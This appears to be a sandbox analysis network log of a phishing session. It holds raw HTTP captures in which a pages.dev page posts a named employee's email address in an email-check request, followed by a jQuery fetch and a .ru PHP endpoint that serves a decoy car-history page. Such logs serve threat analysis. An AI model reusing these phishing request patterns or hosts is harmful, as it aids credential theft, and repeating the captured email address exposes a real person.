                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:32 UTC47OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 3d 63 61 72 6f 6c 69 6e 65 2e 76 69 61 6e 6e 61 40 67 6c 6f 62 61 6c 66 6f 75 6e 64 72 69 65 73 2e 63 6f 6d
                                                                Data Ascii: do=check&em=caroline.vianna@globalfoundries.com
                                                                2024-08-27 18:11:34 UTC786INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QDggovJXkF32b0ETNgWgz%2Br%2BpyQZ0w%2FfpufTSb2b9WJfv0dfc5buInWthuy255hrZj%2BRXK%2BRgMj%2FdxBWFjX3Qi3qe2iE9KVfuN6h2WMkag6I76yxFYzBDS%2FoSS%2FGTkKQpJE%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e0654faf517c1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:34 UTC24INData Raw: 31 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 7d 0d 0a
                                                                Data Ascii: 12{"status":"error"}
                                                                2024-08-27 18:11:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.549754151.101.130.1374436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:32 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:33 UTC612INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 974076
                                                                Date: Tue, 27 Aug 2024 18:11:33 GMT
                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740050-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 5889, 0
                                                                X-Timer: S1724782293.238975,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2024-08-27 18:11:33 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.549755104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:36 UTC349OUTGET ///7627.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:37 UTC776INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AIAWYhDHlC0KfH5wlLKsfu6vNh85ODrF4j0jU3sd2bd43Lt%2BhhP3tH6lVsjTExY2rNm6YR4VGaNCF7EmJuwNxj08DZeiKl3atpnW9LRc0COZdWbIc9wVVms5oiT%2F1w9m%2F4s%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e066b6c9a0f45-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:37 UTC593INData Raw: 31 61 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 75 74 6f 6d 6f 62 69 6c 65 20 48 69 73 74 6f 72 79 20 46 61 6e 73 20 2d 20 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74
                                                                Data Ascii: 1adf<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Automobile History Fans - glansaolksnu.ru</title> <link href="https://cdn.jsdelivr.net
                                                                2024-08-27 18:11:37 UTC1369INData Raw: 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 36 51 49 39 30 48 79 43 69 32 2d 56 66 76 57 51 67 4c 61 70 6d 51 48 61 46 46 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                Data Ascii: s://th.bing.com/th/id/OIP.6QI90HyCi2-VfvWQgLapmQHaFF') no-repeat center center; background-size: cover; color: white; padding: 150px 0; text-align: center; } .content-section {
                                                                2024-08-27 18:11:37 UTC1369INData Raw: 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: s://glansaolksnu.ru/#">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="https://glansaolksnu.ru/#about">About</a> </li> <li class="nav-item">
                                                                2024-08-27 18:11:37 UTC1369INData Raw: 37 38 36 66 35 62 37 63 37 37 37 61 37 35 36 38 37 61 37 34 37 37 37 30 36 38 37 35 36 65 33 35 36 39 36 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 66 64 39 65 39 32 39 33 38 39 39 63 39 65 38 39 62 64 39 61 39 31 39 63 39 33 38 65 39 63 39 32 39 31 39 36 38 65 39 33 38 38 64 33 38 66 38 38 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 35 31 39 2d 31 36 35 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: 786f5b7c777a75687a74777068756e35696e"><span class="__cf_email__" data-cfemail="fd9e9293899c9e89bd9a919c938e9c9291968e9388d38f88">[email&#160;protected]</span></a> or call us at 777-519-1655.</p> <blockquote class="blockquote">
                                                                2024-08-27 18:11:37 UTC1369INData Raw: 74 3d 22 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20
                                                                Data Ascii: t="Modern Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and
                                                                2024-08-27 18:11:37 UTC818INData Raw: 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20
